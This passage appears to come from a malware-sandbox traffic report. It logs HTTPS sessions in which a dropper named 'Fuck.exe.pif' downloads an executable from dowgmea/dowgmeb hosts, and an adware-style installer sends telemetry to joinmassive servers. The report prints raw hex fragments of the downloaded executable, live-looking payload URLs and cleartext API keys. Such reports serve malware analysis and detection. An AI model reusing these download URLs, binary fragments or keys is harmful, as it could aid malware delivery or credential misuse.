                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC32585INData Raw: 5f f2 0c c5 39 18 00 3c 86 cc e5 df 7e 87 ca 7f ad fe b2 1c f4 8b 8d e7 05 6a 8f d5 91 d5 af 33 82 cf fb 79 40 65 bf 19 4d 0c 94 e9 60 7f e2 b6 33 3c 6c 41 db 18 0b cb 51 2b 7e b7 fb 31 b0 17 32 3f 43 0f 70 7e cc 5b 9c 70 ea 21 9b 48 c4 71 5a 41 4c 49 cb fc 83 b8 67 fc f9 a6 a8 8d b4 16 46 7f 59 e5 54 e9 f3 20 6e 01 05 a7 9d b4 d2 c9 04 b7 85 74 c9 e5 47 5b c4 58 68 9f 67 86 1b 6d 94 38 f0 c8 09 3a 26 c5 4b 22 38 df 6e 2c bf 5c 2e af c3 10 e2 cb 89 63 08 6c 95 86 32 f5 8a b2 40 81 3e 42 7d 86 7f 60 d8 94 2d a5 30 df 3d eb 95 3c 97 9e de 18 6b a6 fd a6 11 71 02 33 0c a8 ea d6 2d 33 34 1f e9 73 7d 16 0e 7c 48 8f 30 7c 86 f0 f0 97 75 24 ef b5 09 10 27 e0 84 b5 9f 29 43 e9 38 d0 68 d9 47 77 cd df 67 74 e1 5d 3f 48 3d 22 82 80 a0 60 4c 04 fb 59 3d 76 41 53 46
                                                                                                                                                                                                                                    Data Ascii: _9<~j3y@eM`3<lAQ+~12?Cp~[p!HqZALIgFYT ntG[Xhgm8:&K"8n,\.cl2@>B}`-0=<kq3-34s}|H0|u$')C8hGwgt]?H="`LY=vASF
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC32601INData Raw: 04 f1 c1 2d f8 35 fb c2 bf 34 93 a9 74 54 b8 0f 5e e1 fb 6b 8e cb e9 fb 92 b1 54 2f 0d bc 22 85 04 94 97 40 f3 f3 2f 71 23 58 1b 3f 65 83 a1 13 b6 06 08 c9 3f f5 ab 9a 24 c2 12 ba d3 70 7c 90 45 18 f9 01 0c 52 14 fa 26 0d e9 c5 67 c7 ff fe 85 d2 ef e9 4a f9 8f 95 d4 39 53 de cc 42 5d 82 f9 61 3e 30 ca 98 13 6a 56 d4 f3 0d 97 5c cc f5 b9 36 0c 3c 90 c7 bb 80 bf bc 7c cb f4 51 9c 4a 7d c1 ad 00 a4 35 fb d5 99 a7 6c 07 ce c9 d9 75 1b cd ea 11 87 36 c4 b4 24 e8 4a 45 3d 9b d7 06 97 4d 39 84 5f e5 dc 7d 4b 29 c6 e7 a7 d0 dd 11 c7 0b 0b 6b 79 c8 e7 5a e9 30 9d ef 1a 36 69 01 a7 e7 da 42 f3 0b 44 93 dd 40 74 69 bf 07 cf 68 76 f1 1f bd 7a 74 92 20 07 96 fd 34 e4 aa df 74 2c 37 14 5c 9f c1 72 a3 2b 87 98 fa 30 9f b2 a8 42 e4 b9 f4 70 b6 57 e3 cb c1 06 d8 45 bb a8
                                                                                                                                                                                                                                    Data Ascii: -54tT^kT/"@/q#X?e?$p|ER&gJ9SB]a>0jV\6<|QJ}5lu6$JE=M9_}K)kyZ06iBD@tihvzt 4t,7\r+0BpWE
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC32617INData Raw: 36 ec 26 b9 e9 33 1d 6e b6 eb ad eb d2 ac e0 1a a9 9e 9e 4a 58 5f 2a 87 e7 e6 2b 13 13 5e 8a 50 13 7f c1 1d d8 65 22 88 77 31 6a f7 cb f8 7a 99 11 2a 48 ff 2d bf 16 27 46 72 7f 3b 06 dd bf 79 b8 55 9e fe 6c 49 ae 23 1d 99 d9 30 bb 31 c4 f9 17 92 ce 3c 5b 06 c1 af 44 e4 ba 76 5d ee a2 e8 a8 1d 7e 59 cc d4 55 30 81 8f 75 0c a6 62 6d a2 67 72 ff 20 1d 3d 17 c9 3a 96 1b 10 eb 04 c5 11 77 67 2b 6d 93 41 1e fa 6b 7b 0a 8f 99 ff 74 73 0e d8 e9 e3 8a a6 48 4e 68 92 a9 4c 1a 21 d5 9f d0 2a 6b 4a 12 7f 20 93 b5 bf 42 d9 a8 76 de 72 6b 18 4e b8 b4 34 bb c2 f2 61 89 27 3f f2 11 37 5c af 8d 52 68 5c 26 14 9c ee e4 b4 0f 0e a2 87 80 af 03 47 7e ad 68 fb 65 cf aa 38 57 0b 15 59 00 8c c3 68 23 4e b9 c5 bf 23 c1 b9 62 29 33 ac 18 a1 0a 47 1b fe 95 cf d3 23 12 29 65 fe 8f
                                                                                                                                                                                                                                    Data Ascii: 6&3nJX_*+^Pe"w1jz*H-'Fr;yUlI#01<[Dv]~YU0ubmgr =:wg+mAk{tsHNhL!*kJ BvrkN4a'?7\Rh\&G~he8WYh#N#b)3G#)e
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC32633INData Raw: 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 04 82 02 00 47 58 50 80 89 74 a8 79 dd 4f f4 df 83 6a 64 60 fc 80 01 f8 c1 c2 35 43 bd b2 d4 c7 27 94 4b 41 a9 ae c6 12 34 6c 7f 85 f8 ac 93 52 10 ab 76 5c e6 2f 07 ab 25 57 2a fb be 91 7e bc 44 a9 07 e7 1f b6 55 d6 4b 01 cb 2d 68 c4 5e 45 d4 6d de d9 af 5d 88 04 4d 6a 4b cc 89 56 82 00 90 01 72 7d 0f c5 b6 08 2b dc 87 15 83 37 e6 66 a6 98 5e ff 2e 4f 75 f0 46 d4 fd cb 67 00 0e 99 14 e4 74 b9 16 95 64 75 da 5f 85 2a b5 74 e9 37 e3 5c e7 08 32 31 f3 0d 6f c6 a2 ee 23 60 53 07 5c df af 58 0c 64 ab e6 ab 2c af 0a 55 21 d0 6d 93 61 62 e0 39 51 37 8d 88 b5 a5 e4 c9 90 14 aa a3 18 af 32 3b 45 8c d0 4c be eb d9 c5 c6 6f 1a eb 18 6d 31 f9 fc e4 31 c7 55 4b d9 8a 59 ae 20 65 53 c6 25 e3 7f f0 ac 6b 9a 41 ed bb f6 fa 7a 57
                                                                                                                                                                                                                                    Data Ascii: *HGXPtyOjd`5C'KA4lRv\/%W*~DUK-h^Em]MjKVr}+7f^.OuFgtdu_*t7\21o#`S\Xd,U!mab9Q72;ELom11UKY eS%kAzW


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    23192.168.11.204989213.32.99.56443C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30216OUTPOST /telemetry/ping?source=app&productId=adblockfast&distId=marketator&env=prod HTTP/1.1
                                                                                                                                                                                                                                    Host: api.joinmassive.com
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    x-api-key: vdHv1LwOhm9xuH340hel68pg6cW5X5T96CjMZrof
                                                                                                                                                                                                                                    Content-Length: 262
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30216OUTData Raw: 7b 22 40 74 69 6d 65 73 74 61 6d 70 22 3a 31 36 36 34 38 36 33 38 37 33 32 33 38 2c 22 64 61 74 61 22 3a 7b 22 63 61 6d 70 61 69 67 6e 49 64 22 3a 22 30 22 2c 22 64 69 73 74 49 64 22 3a 22 6d 61 72 6b 65 74 61 74 6f 72 22 2c 22 70 75 62 6c 69 73 68 65 72 49 64 22 3a 22 37 36 37 22 7d 2c 22 69 6e 66 6f 22 3a 7b 22 61 6e 6f 6e 49 64 22 3a 22 31 31 33 38 39 34 30 36 2d 30 33 37 37 2d 34 37 65 64 2d 39 38 63 37 2d 64 35 36 34 65 36 38 33 63 36 65 62 22 2c 22 6e 61 6d 65 22 3a 22 41 63 74 69 76 69 74 79 50 69 6e 67 22 2c 22 70 72 6f 64 75 63 74 49 64 22 3a 22 61 64 62 6c 6f 63 6b 66 61 73 74 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 31 31 33 38 31 36 36 34 38 36 33 38 37 33 22 2c 22 74 79 70 65 22 3a 22 49 6e 66 6f 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 30
                                                                                                                                                                                                                                    Data Ascii: {"@timestamp":1664863873238,"data":{"campaignId":"0","distId":"marketator","publisherId":"767"},"info":{"anonId":"11389406-0377-47ed-98c7-d564e683c6eb","name":"ActivityPing","productId":"adblockfast","sessionId":"11381664863873","type":"Info","version":"0
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC32639INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Content-Length: 16
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:11:13 GMT
                                                                                                                                                                                                                                    x-amzn-RequestId: 4b9a84d7-18cc-4f0f-809c-60e50bead454
                                                                                                                                                                                                                                    x-amz-apigw-id: ZdsBxH9OIAMFxMw=
                                                                                                                                                                                                                                    X-Amzn-Trace-Id: Root=1-633bc071-2b35c2531b02255240f467b4;Sampled=0
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 544814e402956ba93c0a2d2b923e94c2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: FRA60-P3
                                                                                                                                                                                                                                    X-Amz-Cf-Id: i04vsYr37Eh4HcDiq_ib9UBofT3_dZg5o9KXWtVjAKXL2lyL67Uk0g==
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC32639INData Raw: 7b 22 69 6e 74 65 72 76 61 6c 22 3a 36 30 30 7d
                                                                                                                                                                                                                                    Data Ascii: {"interval":600}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    24192.168.11.204989313.32.99.56443C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC32488OUTGET /sdk/config?stage=prod&uid=4c6fdfc9-de78-4899-8dc6-365b9c5db799 HTTP/1.1
                                                                                                                                                                                                                                    x-api-key: 5oydibnqoD6t310DYGMUh7y4e2WWpHvvapKEL4pF
                                                                                                                                                                                                                                    Connection: Close
                                                                                                                                                                                                                                    Host: api.joinmassive.com
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC32640INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Content-Length: 1258
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:11:13 GMT
                                                                                                                                                                                                                                    x-amzn-RequestId: f8231ba1-e9d6-469b-93d4-b551d7339193
                                                                                                                                                                                                                                    x-amz-apigw-id: ZdsByH8MIAMF-zw=
                                                                                                                                                                                                                                    X-Amzn-Trace-Id: Root=1-633bc071-244a6b097de7487a0f32ed7b;Sampled=0
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 6ae82cc0c8a39c993134c2be90b4d120.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: FRA60-P3
                                                                                                                                                                                                                                    X-Amz-Cf-Id: ua78PGbDVjhzuqmIzAKPYj06OCmFOA0lsvlYYNdHz4paM0D6lo9hLA==
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC32640INData Raw: 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 32 30 30 2c 22 62 6f 64 79 22 3a 7b 22 61 6e 61 6c 79 74 69 63 73 22 3a 7b 22 74 72 61 63 6b 69 6e 67 49 44 22 3a 22 55 41 2d 31 33 35 36 39 30 30 32 37 2d 34 31 22 7d 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 41 64 62 6c 6f 63 6b 20 46 61 73 74 20 28 4d 61 72 6b 65 74 61 74 6f 72 29 22 2c 22 74 65 6c 65 6d 65 74 72 79 22 3a 7b 22 73 65 6e 64 43 6f 6d 70 75 74 65 22 3a 30 2c 22 70 75 6c 6c 43 6f 6d 70 75 74 65 22 3a 30 2c 22 61 64 64 72 65 73 73 22 3a 22 68 74 74 70 73 3a 2f 2f 70 72 69 76 61 74 65 2d 61 70 69 2e 6a 6f 69 6e 6d 61 73 73 69 76 65 2e 63 6f 6d 22 7d 2c 22 70 61 72 74 6e 65 72 49 64 22 3a 22 79 36 74 78 44 50 45 58 6c 47 4e 74 67 76 41 45 6c 72 63 4a 31 38 4e 6a 58 66 70 32 22 2c 22 70 6f 6f 6c
                                                                                                                                                                                                                                    Data Ascii: {"statusCode":200,"body":{"analytics":{"trackingID":"UA-135690027-41"},"description":"Adblock Fast (Marketator)","telemetry":{"sendCompute":0,"pullCompute":0,"address":"https://private-api.joinmassive.com"},"partnerId":"y6txDPEXlGNtgvAElrcJ18NjXfp2","pool


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    25192.168.11.204989913.32.99.56443C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC32640OUTGET /postback/adblockfast/marketator?downloadDate=2022-10-04T06%3A10%3A07&anonId=11389406-0377-47ed-98c7-d564e683c6eb&pid=767 HTTP/1.1
                                                                                                                                                                                                                                    Host: api.joinmassive.com
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    2022-10-04 05:11:14 UTC32641INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Content-Length: 21
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:11:14 GMT
                                                                                                                                                                                                                                    x-amzn-RequestId: 7a6c82df-dd86-4758-a0a4-c4a9e3d30461
                                                                                                                                                                                                                                    x-amz-apigw-id: ZdsB1FQyIAMF5HQ=
                                                                                                                                                                                                                                    X-Amzn-Trace-Id: Root=1-633bc071-7d6ccb70152a0f417a7c2b79;Sampled=0
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 c43915e0cad14ee7685e5f74a99ce93c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: FRA60-P3
                                                                                                                                                                                                                                    X-Amz-Cf-Id: UKbgWZWlLNS7FFj_yR4SjtQMnImMeLX84itwTGjPuNRYPIKJt2ZIRg==
                                                                                                                                                                                                                                    2022-10-04 05:11:14 UTC32642INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 53 75 63 63 65 73 73 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"message":"Success"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    3192.168.11.204983923.79.157.152443C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:10:16 UTC15975OUTGET /vs/17/release/vc_redist.x64.exe HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    User-Agent: Inno Setup 6.2.0
                                                                                                                                                                                                                                    Host: aka.ms
                                                                                                                                                                                                                                    2022-10-04 05:10:16 UTC15975INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Server: Kestrel
                                                                                                                                                                                                                                    Location: https://download.visualstudio.microsoft.com/download/pr/7331f052-6c2d-4890-8041-8058fee5fb0f/CE6593A1520591E7DEA2B93FD03116E3FC3B3821A0525322B0A430FAA6B3C0B4/VC_redist.x64.exe
                                                                                                                                                                                                                                    Request-Context: appId=cid-v1:7d63747b-487e-492a-872d-762362f77974
                                                                                                                                                                                                                                    X-Response-Cache-Status: True
                                                                                                                                                                                                                                    Expires: Tue, 04 Oct 2022 05:10:16 GMT
                                                                                                                                                                                                                                    Cache-Control: max-age=0, no-cache, no-store
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:10:16 GMT
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000 ; includeSubDomains


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    4192.168.11.2049841188.114.96.3443C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:10:17 UTC15975OUTGET /gamexyz/3004/random.exe HTTP/1.1
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                    Host: a.dowgmea.com
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15976INHTTP/1.1 302 Found
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:10:18 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Location: https://b.dowgmeb.com/gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exe
                                                                                                                                                                                                                                    CF-Cache-Status: BYPASS
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p5zFeVASa4sL9w3mYE8ZygIlrvGAOB6guSePcjFWXx5KhSidzTPfB1XWMdKdL4rkr2bH9Ad%2FuyHUwUrVwOkAfJLNxlt6J4w5EzIwScbAdPf99aST5oiF%2Bpb%2FvwrPjBUn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 754b69079f2392c6-FRA
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15976INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    5192.168.11.2049842188.114.97.3443C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15976OUTGET /gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exe HTTP/1.1
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Host: b.dowgmeb.com
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15977INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:10:18 GMT
                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="fliu.exe"
                                                                                                                                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Cache-Control: max-age=14400
                                                                                                                                                                                                                                    CF-Cache-Status: MISS
                                                                                                                                                                                                                                    Last-Modified: Tue, 04 Oct 2022 05:10:18 GMT
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gnQBRTyiMs8Bw7fXF5E1yXGgUCkrvUJITgvwNyYQFCkhD5s7pzTZiLzr%2B5aHjNhv3CFUXIjKDvGzNpm4pN9lYgeaVoIENQBWEGakwg6QQZ561XBb8XclcTYpmz%2FojFkP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 754b690bed8890fa-FRA
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15977INData Raw: 37 63 64 35 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 65 e9 18 98 21 88 76 cb 21 88 76 cb 21 88 76 cb e2 87 29 cb 20 88 76 cb 06 4e 0b cb 35 88 76 cb 06 4e 18 cb 0a 88 76 cb 06 4e 1b cb 7a 88 76 cb e2 87 2b cb 26 88 76 cb 21 88 77 cb 46 88 76 cb 06 4e 04 cb 23 88 76 cb 06 4e 0e cb 20 88 76 cb 52 69 63 68 21 88 76 cb 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 a1 3e 29 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b
                                                                                                                                                                                                                                    Data Ascii: 7cd5MZ@!L!This program cannot be run in DOS mode.$e!v!v!v) vN5vNvNzv+&v!wFvN#vN vRich!vPEL>)c
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15978INData Raw: 40 00 00 c0 2e 72 73 72 63 00 00 00 00 10 00 00 00 30 01 00 00 10 00 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: @.rsrc0 @@
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15979INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15981INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15982INData Raw: ec 40 00 50 ff 15 04 d0 40 00 8b 4c 24 0c 33 cc e8 86 0d 00 00 83 c4 10 c3 56 8b f0 0f b7 0e 66 85 c9 57 74 46 0f b7 d1 81 ee f4 ec 40 00 66 85 d2 b9 f4 ec 40 00 74 24 90 0f b7 11 66 85 d2 74 2c 0f b7 3c 0e 0f b7 d2 2b fa 75 0a 83 c1 02 66 83 3c 0e 00 75 e3 66 83 39 00 74 11 0f b7 50 02 83 c0 02 83 c6 02 66 85 d2 75 c3 33 c0 5f 5e c3 cc cc cc cc cc cc cc cc cc 83 ec 1c a1 20 00 41 00 33 c4 89 44 24 18 b0 65 88 44 24 0e 88 44 24 11 88 44 24 15 88 44 24 01 88 44 24 04 b2 72 b1 6c 8d 04 24 50 c6 44 24 10 43 88 54 24 11 c6 44 24 13 61 c6 44 24 14 74 c6 44 24 16 46 c6 44 24 17 69 88 4c 24 18 c6 44 24 1a 57 c6 44 24 1b 00 c6 44 24 04 6b 88 54 24 06 c6 44 24 07 6e 88 4c 24 09 c6 44 24 0a 33 c6 44 24 0b 32 c6 44 24 0c 00 ff 15 08 d0 40 00 8d 4c 24 0c 51 50 ff 15
                                                                                                                                                                                                                                    Data Ascii: @P@L$3VfWtF@f@t$ft,<+uf<uf9tPfu3_^ A3D$eD$D$D$D$D$rl$PD$CT$D$aD$tD$FD$iL$D$WD$D$kT$D$nL$D$3D$2D$@L$QP
                                                                                                                                                                                                                                    2022-10-04 05:10:18 UTC15983INData Raw: 85 c0 74 08 8b 08 8b 51 08 50 ff d2 b8 01 00 00 00 8b 8c 24 98 00 00 00 64 89 0d 00 00 00 00 59 5f 5e 5d 5b 8b 8c 24 80 00 00 00 33 cc e8 10 08 00 00 81 c4 90 00 00 00 c3 cc cc cc cc cc cc cc 8b 00 85 c0 74 08 8b 08 8b 51 08 50 ff d2 c3 cc 6a ff 68 db ca 40 00 64 a1 00 00 00 00 50 81 ec b0 02 00 00 a1 20 00 41 00 33 c4 89 84 24 a8 02 00 00 53 55 56 57 a1 20 00 41 00 33 c4 50 8d 84 24 c4 02 00 00 64 a3 00 00 00 00 a1 ac 20 41 00 8b f1 33 db 33 ed 3b f0 89 6c 24 28 89 5c 24 14 74 26 50 ff 15 38 d1 40 00 3b f3 74 15 56 ff 15 34 d1 40 00 3b c3 a3 ac 20 41 00 75 0b e9 fe f7 ff ff 89 1d ac 20 41 00 8d 44 24 14 50 68 fc ec 40 00 6a 17 53 68 0c ed 40 00 ff 15 a8 20 41 00 85 c0 7d 07 33 c0 e9 f5 03 00 00 8b 35 d8 0c 41 00 8b 4c 24 14 8b 11 83 ec 10 8b c4 89 30 8b
                                                                                                                                                                                                                                    Data Ascii: tQP$dY_^][$3tQPjh@dP A3$SUVW A3P$d A33;l$(\$t&P8@;tV4@; Au AD$Ph@jSh@ A}35AL$0
